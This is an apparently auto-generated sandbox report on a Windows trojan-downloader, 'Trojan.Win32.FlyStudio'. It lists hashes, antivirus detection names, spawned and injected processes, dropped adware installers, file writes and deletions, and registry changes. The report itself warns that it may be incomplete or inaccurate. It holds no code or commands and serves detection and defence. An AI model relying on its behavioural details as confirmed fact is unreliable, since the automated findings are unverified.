Skip to main content

Trojan.Win32.FlyStudio_4937d0d8c1


HEUR:Trojan-Downloader.Win32.Generic (Kaspersky), Trojan.Agent.BDJT (B) (Emsisoft), Trojan.Agent.BDJT (AdAware), Trojan-PSW.Win32.MSNPassword.FD, Trojan.Win32.Alureon.FD, Trojan.Win32.FlyStudio.FD, mzpefinder_pcap_file.YR, TrojanFlyStudio.YR (Lavasoft MAS)Behaviour: Trojan-Downloader, Trojan-PSW, Trojan

The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Summary

MD5: 4937d0d8c199fab565657944560f67d1

SHA1: 5737a160ebc28f0bf83d2c4fa4accc59893a551c

SHA256: af3654e6a7ce82418e14b8d42487da9c09329eca7c5cf022bbcfa1e89f7967fb

SSDeep: 12288:M8cXSrqphitkdebZlqe8a 4pQGZjLfPtaXQsFhKF:M8cXSMit1bCQrjTlaA

Size: 494592 bytes

File type: EXE

Platform: WIN32

Entropy: Packed

PEID: ASPackv212, UPolyXv05_v6

Company: no certificate found

Created at: 2014-06-07 06:12:39

Analyzed on: WindowsXP SP3 32-bit

Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Dynamic Analysis

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

Wuji.exe:568
FhCalendar.exe:452
wujiime.exe:464
MSIB.tmp:916
xxdd_165.exe:452
updroots.exe:1016
114gglm_016.exe:488
Update.exe:444
fhrl_6_12001.exe:320
fhsli_6_12001.exe:1852
netsh.exe:436
netsh.exe:628
SportLive.exe:908
MsiExec.exe:1760
oemfhsli.exe:628

The Trojan injects its code into the following process(es):

FhCalendar.exe:588
%original file name%.exe:1832

File activity

The process FhCalendar.exe:588 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\fixad[1].htm (1737 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\GetHoliday[1].ashx (876 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\SendClickData[1].ashx (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W1YHYF09\picchange[1].css (584 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W1YHYF09\sogou_icon_short[1].png (1421 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@sogou[2].txt (977 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AVSTIBOT\qi[1].htm (162 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W1YHYF09\picchange[1].js (908 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MRYNK3CL\c[1].js (376 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MRYNK3CL\82ea18df-b4ae-4b17-b1ab-46cba4b98343[1].jpg (19946 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\CAH4OJPH.htm (2844 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@sogou[1].txt (1403 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\GetConfig[1].ashx (330 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AVSTIBOT\pixel[1].htm (6 bytes)
%Program Files%\fhrl\note.ini (991 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AVSTIBOT\CAQJWRVK.htm (1684 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W1YHYF09\924aed3e-a026-4cc3-996e-72927d75dda5[1].jpg (7278 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AVSTIBOT\jquery-1.3.2.min[1].js (36827 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\qi[1].htm (162 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\GetWeather[1].ashx (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MRYNK3CL\c[2].js (421 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\qi[2].htm (162 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\CAKPO1SZ.htm (3738 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (1952 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MRYNK3CL\48aaf3d6-f95f-4921-8a68-2606aed69a12[1].jpg (13306 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\GetWeather[1].ashx (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\GetConfig[1].ashx (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MRYNK3CL\c[1].js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\GetHoliday[1].ashx (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\SendClickData[1].ashx (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@sogou[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@sogou[2].txt (0 bytes)

The process wujiime.exe:464 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Program Files%\Wuji\Wuji.exe (7209 bytes)
%Program Files%\Wuji\update.exe (7451 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\无极输入法\无极输入法.lnk (638 bytes)
%Program Files%\Wuji\Wuji.dat (1945 bytes)
%Program Files%\Wuji\uninst.exe (3685 bytes)
%Documents and Settings%\%current user%\Desktop\无极输入法.lnk (626 bytes)
%Program Files%\Wuji\Wuji.dll (2422 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\无极输入法\卸载无极输入法.lnk (479 bytes)
%System%\catsrvuz.dll (53 bytes)
%Program Files%\Wuji\Show.dat (5 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Desktop\无极输入法.lnk (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nssD.tmp (0 bytes)
%Program Files%\Wuji\Wuji.dll (0 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\无极输入法\卸载无极输入法.lnk (0 bytes)

The process xxdd_165.exe:452 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Program Files%\xxdd\Liveconfig.ini (22 bytes)
%Program Files%\xxdd\xxdd.msi (146581 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsr4.tmp (0 bytes)

The process 114gglm_016.exe:488 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\wujiime.exe (2105 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsrC.tmp (0 bytes)

The process Update.exe:444 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\version[1].txt (72 bytes)
%Program Files%\fhrl\Update.log (402 bytes)
%Program Files%\fhrl\fhUp\Update\version.ini (72 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\version[1].txt (0 bytes)

The process fhrl_6_12001.exe:320 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Program Files%\fhrl\Skin\test\btn_push.png (263 bytes)
%Program Files%\fhrl\Skin\test\clock_bk.png (2 bytes)
%Program Files%\fhrl\Skin\test\²Ëµ¥bk.png (1 bytes)
%Program Files%\fhrl\Skin\test\È·ÈÏ°´Å¥2̬.png (1 bytes)
%Program Files%\fhrl\Skin\test\ÀͶ¯½Ú.png (1 bytes)
%Program Files%\fhrl\Skin\test\closetip_hov.png (4 bytes)
%Program Files%\fhrl\Skin\test\xpopweb.xml (2 bytes)
%Program Files%\fhrl\Skin\test\jsq_del_push.png (1 bytes)
%Program Files%\fhrl\Skin\test\xhlwnd.xml (2 bytes)
%Program Files%\fhrl\Skin\test\¹úÇì½Ú.png (508 bytes)
%Program Files%\fhrl\Skin\test\equal_push.png (1 bytes)
%Program Files%\fhrl\Skin\test\city_hov.png (1 bytes)
%Program Files%\fhrl\Skin\test\button_hover.png (792 bytes)
%Program Files%\fhrl\Skin\test\finish_push.png (417 bytes)
%Program Files%\fhrl\Skin\test\mini_bk.png (14 bytes)
%Program Files%\fhrl\Skin\test\go_hov.png (2 bytes)
%Program Files%\fhrl\Fhuninstall.exe (9178 bytes)
%Program Files%\fhrl\Skin\test\½Ìʦ½Ú.png (545 bytes)
%Program Files%\fhrl\Skin\test\ca_push.png (2 bytes)
%Program Files%\fhrl\Skin\test\ÆßϦ½Ú.png (930 bytes)
%Program Files%\fhrl\Skin\test\go_nor.png (2 bytes)
%Program Files%\fhrl\FMTest.exe (14713 bytes)
%Program Files%\fhrl\huangli.xml (6456 bytes)
%Program Files%\fhrl\Skin\test\finish_hov.png (413 bytes)
%Program Files%\fhrl\Skin\test\shop_hov.png (2 bytes)
%Program Files%\fhrl\Skin\test\closetip_push.png (4 bytes)
%Program Files%\fhrl\Skin\test\input.png (3 bytes)
%Program Files%\fhrl\Skin\test\back_push.png (2 bytes)
%Program Files%\fhrl\Update.exe (17508 bytes)
%Program Files%\fhrl\Skin\test\btn_mini_down.png (279 bytes)
%Program Files%\fhrl\KillProc.exe (4255 bytes)
%Program Files%\fhrl\Skin\test\calendar.png (7 bytes)
%Program Files%\fhrl\Skin\test\day_hov.png (1 bytes)
%Program Files%\fhrl\Skin\Default\uninst_btn_uninstall.png (1392 bytes)
%Program Files%\fhrl\Skin\test\setting_nor.png (1 bytes)
%Program Files%\fhrl\Skin\test\clocknote_list_item.xml (3 bytes)
%Program Files%\fhrl\Skin\test\¼Ù.png (1 bytes)
%Program Files%\fhrl\Skin\test\edit_nor.png (431 bytes)
%Program Files%\fhrl\Skin\test\button_B_hover.png (613 bytes)
%Program Files%\fhrl\Skin\test\clock_nor.png (2 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\·çºÍÈÕÀú\·çºÍÈÕÀú.lnk (686 bytes)
%Program Files%\fhrl\uninst.exe (738 bytes)
%Program Files%\fhrl\Skin\test\ÖÐÇï½Ú.png (1 bytes)
%Program Files%\fhrl\Skin\test\shop_nor.png (1 bytes)
%Program Files%\fhrl\Skin\test\Combo_over.bmp (3 bytes)
%Program Files%\fhrl\Skin\test\xfhnotetip.xml (1 bytes)
%Program Files%\fhrl\FMDLL32.dll (14324 bytes)
%Program Files%\fhrl\Skin\test\look_push.png (2 bytes)
%Program Files%\fhrl\Skin\test\menu.xml (1 bytes)
%Program Files%\fhrl\Skin\test\jsq_process.png (3 bytes)
%Program Files%\fhrl\Skin\test\jia_hov.png (1 bytes)
%Program Files%\fhrl\Skin\test\Refresh_hover.png (1 bytes)
%Program Files%\fhrl\Skin\test\clock_sel.png (2 bytes)
%Program Files%\fhrl\Skin\test\tip_bk.png (2 bytes)
%Program Files%\fhrl\Skin\test\equal_nor.png (1 bytes)
%Program Files%\fhrl\Skin\test\³ýϦ.png (1 bytes)
%Program Files%\fhrl\Skin\test\setting_hov.png (1 bytes)
%Program Files%\fhrl\Skin\Default\uninst_btn_back.png (1 bytes)
%Program Files%\fhrl\Skin\warn.wav (314 bytes)
%Program Files%\fhrl\subdivis.db (4 bytes)
%Program Files%\fhrl\Skin\test\shop_sel.png (2 bytes)
%Program Files%\fhrl\Skin\test\jsq_show.png (3 bytes)
%Program Files%\fhrl\Update\version.ini (72 bytes)
%Program Files%\fhrl\Skin\test\btn_mini_normal.png (1578 bytes)
%Program Files%\fhrl\Skin\test\xminiweb.xml (2 bytes)
%Program Files%\fhrl\Skin\test\js_push.png (1 bytes)
%Program Files%\fhrl\Skin\test\clock_del_hov.png (1 bytes)
%Program Files%\fhrl\Skin\test\look_nor.png (2 bytes)
%Program Files%\fhrl\Skin\test\jsq_nor.png (1 bytes)
%Program Files%\fhrl\Skin\test\index_1.png (2 bytes)
%Program Files%\fhrl\Skin\Default\foembin.exe (12158 bytes)
%Program Files%\fhrl\Skin\test\button_normal.png (676 bytes)
%Program Files%\fhrl\Skin\test\xiala_1.png (1 bytes)
%Program Files%\fhrl\Skin\test\Ôªµ©.png (2 bytes)
%Program Files%\fhrl\Skin\test\btn_hot.png (1228 bytes)
%Program Files%\fhrl\FhCalendar.exe (19232 bytes)
%Program Files%\fhrl\Skin\Default\Skin.ini (1 bytes)
%Program Files%\fhrl\Skin\test\Ê¥µ®½Ú.png (873 bytes)
%Program Files%\fhrl\Skin\test\js_sel.png (1 bytes)
%Program Files%\fhrl\Skin\test\index.png (2 bytes)
%Program Files%\fhrl\Skin\test\btn_close_highlight.png (475 bytes)
%Program Files%\fhrl\Skin\test\ca_nor.png (2 bytes)
%Program Files%\fhrl\Skin\Default\unist_btn_next.png (1350 bytes)
%Program Files%\fhrl\Skin\test\¸Ð¶÷½Ú.png (1 bytes)
%Program Files%\fhrl\Skin\test\¹í½Ú.png (913 bytes)
%Program Files%\fhrl\Skin\test\¼ÙÑ¡ÖÐ.PNG (3 bytes)
%Program Files%\fhrl\Skin\test\xbasicsetting.xml (4 bytes)
%Program Files%\fhrl\Skin\test\tip.png (1 bytes)
%Program Files%\fhrl\Skin\test\jsq_del_hov.png (1 bytes)
%Program Files%\fhrl\FMDLL.dll (14673 bytes)
%Program Files%\fhrl\Skin\test\close_push.png (1 bytes)
%Program Files%\fhrl\Skin\test\xiala_3.png (1 bytes)
%Program Files%\fhrl\DuiLib_u.dll (10572 bytes)
%Program Files%\fhrl\Skin\test\day_push.png (1 bytes)
%Program Files%\fhrl\Skin\test\xfh.xml (1568 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\·çºÍÈÕÀú.lnk (692 bytes)
%Program Files%\fhrl\Skin\test\scrollbar.bmp (1568 bytes)
%Program Files%\fhrl\Skin\test\´º½Ú.png (1 bytes)
%Documents and Settings%\All Users\Desktop\·çºÍÈÕÀú.lnk (674 bytes)
%Program Files%\fhrl\Skin\test\dian.png (290 bytes)
%Program Files%\fhrl\Skin\test\clock_del_push.png (1 bytes)
%Program Files%\fhrl\Skin\test\back_nor.png (2 bytes)
%Program Files%\fhrl\Skin\test\S_22.png (1 bytes)
%Program Files%\fhrl\Skin\test\ÖØÑô½Ú.png (2 bytes)
%Program Files%\fhrl\Skin\Default\Controls.ini (285 bytes)
%Program Files%\fhrl\Skin\Default\bin.ini (1 bytes)
%Program Files%\fhrl\Skin\test\¶ËÎç½Ú.png (1 bytes)
%Program Files%\fhrl\Skin\test\delapp1.png (1 bytes)
%Program Files%\fhrl\Skin\test\close_hov.png (1 bytes)
%Program Files%\fhrl\Skin\test\del_nor.png (1 bytes)
%Program Files%\fhrl\Skin\test\new_hov.png (1 bytes)
%Program Files%\fhrl\Skin\test\logo.png (4 bytes)
%Program Files%\fhrl\Skin\test\Festival.xml (1 bytes)
%Program Files%\fhrl\Skin\Default\uninst_pic_top.png (1568 bytes)
%Program Files%\fhrl\Skin\test\back_hov.png (2 bytes)
%Program Files%\fhrl\Skin\test\ÇåÃ÷½Ú.png (1 bytes)
%Program Files%\fhrl\Skin\test\js_nor.png (1 bytes)
%Program Files%\fhrl\Skin\test\equal_hov.png (1 bytes)
%Program Files%\fhrl\Skin\test\¸¾Å®½Ú.png (1 bytes)
%Program Files%\fhrl\Skin\test\¸¸Ç×½Ú.png (846 bytes)
%Program Files%\fhrl\Skin\test\edit_push.png (432 bytes)
%Program Files%\fhrl\Skin\test\¶ùͯ½Ú.png (1 bytes)
%Program Files%\fhrl\Skin\test\button_down.png (784 bytes)
%Program Files%\fhrl\Skin\test\delapp.png (3 bytes)
%Program Files%\fhrl\Skin\test\clock_hov.png (2 bytes)
%Program Files%\fhrl\Skin\test\btn_close_normal.png (1682 bytes)
%Program Files%\fhrl\Skin\test\ÓÞÈ˽Ú.png (991 bytes)
%Program Files%\fhrl\Skin\test\go_push.png (2 bytes)
%Program Files%\fhrl\Skin\test\lunar.png (2 bytes)
%Program Files%\fhrl\Skin\test\°àÑ¡ÖÐ.PNG (3 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Startup\·çºÍÈÕÀú.lnk (686 bytes)
%Program Files%\fhrl\Skin\test\new_push.png (1 bytes)
%Program Files%\fhrl\Skin\test\day_nor.png (1 bytes)
%Program Files%\fhrl\Skin\test\js_hov.png (2 bytes)
%Program Files%\fhrl\Skin\test\logo_16icon.png (3 bytes)
%Program Files%\fhrl\Skin\test\bg10.png (1568 bytes)
%Program Files%\fhrl\Skin\test\ĬÈÏ.png (1 bytes)
%Program Files%\fhrl\Skin\test\tip_content_bk.png (3 bytes)
%Program Files%\fhrl\Skin\Default\line.png (2 bytes)
%Program Files%\fhrl\Skin\test\scrollbar.png (1 bytes)
%Program Files%\fhrl\Skin\test\shop_push.png (1 bytes)
%Program Files%\fhrl\Skin\test\city_push.png (1 bytes)
%Program Files%\fhrl\Skin\test\button_B_pushed.png (605 bytes)
%Program Files%\fhrl\Skin\test\logo_mini.png (1 bytes)
%Program Files%\fhrl\Skin\test\app_bk.png (2 bytes)
%Program Files%\fhrl\Skin\test\menu_bk.png (3 bytes)
%Program Files%\fhrl\Skin\test\jia_nor.png (1 bytes)
%Program Files%\fhrl\Skin\test\ÔªÏü½Ú.png (1 bytes)
%Program Files%\fhrl\Skin\test\scrollbar_o.png (1975 bytes)
%Program Files%\fhrl\Skin\test\jsq_push.png (1 bytes)
%Program Files%\fhrl\Skin\test\del_hov.png (1 bytes)
%Program Files%\fhrl\Skin\test\ƽ°²Ò¹.png (1 bytes)
%Program Files%\fhrl\Skin\test\finish_nor.png (425 bytes)
%Program Files%\fhrl\Skin\test\ca_sel.png (2 bytes)
%Program Files%\fhrl\Skin\test\jsq_res.png (3 bytes)
%Program Files%\fhrl\Skin\test\ĬÈÏÑ¡ÖÐ.png (2 bytes)
%Program Files%\fhrl\Skin\test\jintian3.png (3 bytes)
%Program Files%\fhrl\Skin\test\layerClo.png (1 bytes)
%Program Files%\fhrl\Skin\Default\btn_radio.png (1 bytes)
%Program Files%\fhrl\Skin\test\È·ÈÏ°´Å¥³£Ì¬.png (1 bytes)
%Program Files%\fhrl\Skin\test\button_B_normal.png (474 bytes)
%Program Files%\fhrl\Skin\test\setting_push.png (1 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\·çºÍÈÕÀú\жÔØ·çºÍÈÕÀú.lnk (691 bytes)
%Program Files%\fhrl\Skin\test\clock_del_nor.png (1 bytes)
%Program Files%\fhrl\Skin\test\chat_mid_bk.png (1308 bytes)
%Program Files%\fhrl\Skin\test\closetip_nor.png (4 bytes)
%Program Files%\fhrl\Skin\test\clock_note_setting.xml (8 bytes)
%Program Files%\fhrl\Skin\test\Refresh_pushed.png (1 bytes)
%Program Files%\fhrl\Skin\Default\uninst_btn_cancel.png (890 bytes)
%Program Files%\fhrl\Skin\test\ĸÇ×½Ú.png (1 bytes)
%Program Files%\fhrl\Skin\test\S_11.png (1 bytes)
%Program Files%\fhrl\Skin\test\look_hov.png (2 bytes)
%Program Files%\fhrl\Skin\Default\uninst_btn_close.png (2 bytes)
%Program Files%\fhrl\Skin\test\bord_bk.png (3 bytes)
%Program Files%\fhrl\Skin\test\Combo_nor.bmp (3 bytes)
%Program Files%\fhrl\Skin\test\btn_mini_highlight.png (1440 bytes)
%Program Files%\fhrl\Skin\test\btn_close_down.png (1098 bytes)
%Program Files%\fhrl\Skin\test\°à.png (1 bytes)
%Program Files%\fhrl\Skin\test\jsq_hov.png (1 bytes)
%Program Files%\fhrl\Skin\test\close_nor.png (1 bytes)
%Program Files%\fhrl\Skin\test\ÇéÈ˽Ú.png (1 bytes)
%Program Files%\fhrl\Skin\Default\uninst_btn_check.png (3 bytes)
%Program Files%\fhrl\Skin\test\edit_hov.png (429 bytes)
%Program Files%\fhrl\Skin\test\clock_push.png (2 bytes)
%Program Files%\fhrl\Skin\test\¹â¹÷½Ú.png (536 bytes)
%Program Files%\fhrl\Skin\test\Refresh_normal.png (1 bytes)
%Program Files%\fhrl\Skin\test\jsq_del_nor.png (1 bytes)
%Program Files%\fhrl\Skin\test\xiala_2.png (1 bytes)
%Program Files%\fhrl\Skin\test\del_push.png (1 bytes)
%Program Files%\fhrl\Skin\test\jia_push.png (1 bytes)
%Program Files%\fhrl\Skin\test\ca_hov.png (2 bytes)
%Program Files%\fhrl\Skin\test\new_nor.png (1 bytes)
%Program Files%\fhrl\Skin\test\weather_bk.png (15 bytes)
%Program Files%\fhrl\Skin\test\friend_list_item.xml (2 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nse3.tmp (0 bytes)

The process fhsli_6_12001.exe:1852 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsh2.tmp\System.dll (10 bytes)
%Program Files%\Common Files\Install\fhrlsli\info.ini (996 bytes)
%Program Files%\Common Files\Install\fhrlsli\oemfhsli.exe (17882 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsh2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh2.tmp\System.dll (0 bytes)

The process SportLive.exe:908 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W1YHYF09\lb[1].png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W1YHYF09\iau[1].htm (1 bytes)
%Program Files%\xxss.ini (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MRYNK3CL\core[1].php (800 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\z_stat[1].php (1177 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MRYNK3CL\ad_sport[1].jpg (12251 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@cnzz[1].txt (163 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W1YHYF09\addetail[1].html (308 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\ad[1].htm (519 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@mmstat[1].txt (168 bytes)
%Program Files%\TogouInputin\Togoupplib.dat (2095 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\jquery-1.9.1.min[1].js (55677 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AVSTIBOT\type[1].js (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\event[1].css (554 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@cnzz.mmstat[1].txt (203 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AVSTIBOT\addetail[1].htm (413 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W1YHYF09\center-titlebg[1].png (948 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AVSTIBOT\event[1].htm (23 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MRYNK3CL\common[1].js (73 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\stat[1].gif (43 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@sport.yuejan[1].txt (214 bytes)

The process %original file name%.exe:1832 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

C:\fhsli_6_12001.exe (1616 bytes)
C:\114gglm_016.exe (1664 bytes)
C:\xxdd_165.exe (30622 bytes)

The process oemfhsli.exe:628 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\GetConfig[1].ashx (330 bytes)
%Documents and Settings%\All Users\Documents\fhrl_6_12001.exe (13084 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\info[1].ini (997 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\Setup[1].ashx (38 bytes)
%Program Files%\Common Files\Install\fhrlsli\info.ini (997 bytes)
%Program Files%\fhrl\info.db (120 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\Setup[1].ashx (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\GetConfig[1].ashx (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\info[1].ini (0 bytes)

Registry activity

The process Wuji.exe:568 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 20 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"
"TypesSupported" = "7"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"

[HKCU\Software\VB and VBA Program Settings\fzl\2013]
"zc1" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"LogSessionName" = "stdout"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKCU\Software\VB and VBA Program Settings\fzl\2013]
"zc4" = "1"
"zc5" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EB C0 45 22 1E 9D 7B 43 9E B3 E3 26 49 49 C8 76"

